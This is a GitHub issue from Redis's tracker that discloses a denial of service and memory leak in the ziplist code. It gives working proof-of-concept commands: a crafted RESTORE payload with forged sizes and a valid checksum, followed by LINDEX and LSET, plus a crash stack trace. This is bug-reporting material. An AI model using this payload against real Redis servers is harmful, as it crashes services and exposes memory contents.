Skip to content

denial of service (daemon crash) & data leak #7445

New issue
New issue
Closed
#7807
Closed
denial of service (daemon crash) & data leak#7445
#7807
@0xPwny

Description

@0xPwny
0xPwny
opened on Jun 30, 2020

a denial of service (daemon crash) via a crafted RESTORE command that is mishandled by the __ziplistDelete function in ziplist.c.

script below are used to change and element size and pass crc64 check :
-https://gist.github.com/0xPwny/1824650b034106b643c30e22d0b133e5

commands to trigger the crash

FLUSHALL

LPUSH louza "AAAA"
LPUSH louza "BBBB"
LPUSH louza "CCCC"

FLUSHALL

RESTORE louza 0 "\x0e\x01\x1d\x1d\x00\x00\x00\x16\x00\x00\x00\x03\x00\x00\x04CCCC\x06\x04BBBB\x06\x3fAAAA\xff\t\x00\x88\xa5\xca\xa8\xc5A\xf45" //RESTORE with crafted data

LINEDX louza 2 // data-leak

LSET louza 2 "BEEF"

=== REDIS BUG REPORT START: Cut & paste starting from here ===
22582:M 19 Jun 2020 18:29:20.000 # Redis 6.0.5 crashed by signal: 11
22582:M 19 Jun 2020 18:29:20.000 # Crashed running the instruction at: 0x7fe9ce61ee38
22582:M 19 Jun 2020 18:29:20.000 # Accessing address: 0x7fe9ce400000
22582:M 19 Jun 2020 18:29:20.001 # Failed assertion: (:0)

------ STACK TRACE ------
EIP:
/lib/x86_64-linux-gnu/libc.so.6(+0x15fe38)[0x7fe9ce61ee38]

Backtrace:
./redis-server *:6379(logStackTrace+0x45)[0x478fb5]
./redis-server *:6379(sigsegvHandler+0xb9)[0x479779]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x11390)[0x7fe9ce89a390]
/lib/x86_64-linux-gnu/libc.so.6(+0x15fe38)[0x7fe9ce61ee38]
./redis-server *:6379(__ziplistDelete+0x12c)[0x440b4c]
./redis-server *:6379(ziplistDelete+0x1d)[0x44143d]
./redis-server *:6379(quicklistReplaceAtIndex+0x44)[0x42caf4]
./redis-server *:6379(lsetCommand+0xd3)[0x45fb33]
./redis-server *:6379(call+0xab)[0x4350cb]
./redis-server *:6379(processCommand+0x43f)[0x43596f]
./redis-server *:6379(processCommandAndResetClient+0x10)[0x443660]
./redis-server *:6379(processInputBuffer+0xdd)[0x4479dd]
./redis-server *:6379(readQueryFromClient+0x232)[0x448022]
./redis-server *:6379[0x4c5613]
./redis-server *:6379(aeProcessEvents+0x2e6)[0x42e706]
./redis-server *:6379(aeMain+0x1d)[0x42ea8d]
./redis-server *:6379(main+0x4c5)[0x42b0c5]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fe9ce4df830]
./redis-server *:6379(_start+0x29)[0x42b389]

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions